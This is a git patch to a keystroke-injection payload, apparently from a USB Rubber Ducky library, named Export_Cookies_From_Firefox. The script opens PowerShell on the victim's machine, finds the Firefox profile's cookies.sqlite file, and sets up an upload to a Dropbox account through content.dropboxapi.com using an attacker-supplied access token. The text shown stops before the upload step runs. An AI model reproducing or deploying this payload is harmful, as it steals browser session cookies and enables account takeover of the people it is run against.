From 30cf14a1c00937e4c39951164a9158f0a1342594 Mon Sep 17 00:00:00 2001
From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com>
Date: Mon, 12 Jun 2023 14:29:47 -0400
Subject: [PATCH] Update payload.txt
---
 .../Export_Cookies_From_Firefox/payload.txt | 17 +++++------------
 1 file changed, 5 insertions(+), 12 deletions(-)
diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
index 3ef6e5c..98bcbaa 100644
--- a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
+++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
@@ -16,31 +16,24 @@ REM - Firefox must be installed
 REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
 DEFINE DROPBOX_ACCESS_TOKEN "example"
-
-DELAY 1000
+DEFAULT_DELAY 500
 GUI r
-DELAY 500
-STRING powershell
-DELAY 500
-ENTER
+STRINGLN powershell
 DELAY 2000
 REM Get cookies DB path
-STRINGLN
+STRINGLN_BLOCK
 $firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
 $firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}
-
 $filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
-
 END_STRINGLN
 REM Setting about exfiltration
-STRING $accessToken =
-STRING DROPBOX_ACCESS_TOKEN
+STRINGLN $accessToken = DROPBOX_ACCESS_TOKEN
 ENTER
-STRINGLN
+STRINGLN_BLOCK
 $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
 $dropboxFilePath = "/cookies_exported.sqlite"